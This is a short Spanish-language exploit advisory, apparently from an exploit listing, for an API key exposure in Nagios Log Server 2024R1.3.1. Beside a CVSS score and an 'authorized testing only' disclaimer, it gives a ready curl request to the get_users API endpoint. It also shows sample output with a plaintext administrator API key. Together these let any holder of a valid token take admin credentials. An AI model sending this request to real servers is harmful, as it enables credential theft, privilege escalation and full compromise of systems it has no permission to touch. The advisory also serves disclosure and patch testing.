
Exposición de clave de API autenticada en Nagios Log Server 2024R1.3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:HSolo para investigación y pruebas autorizadas. No lo utilice contra sistemas sin permiso.
Una vulnerabilidad a nivel de API en Nagios Log Server 2024R1.3.1 permite a cualquier usuario con un token de API válido recuperar una lista completa de cuentas de usuario junto con sus claves API en texto plano, incluidas las credenciales de administrador. Esta falla permite la enumeración de usuarios, la escalada de privilegios y el compromiso total del sistema mediante el uso no autorizado de tokens expuestos.
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]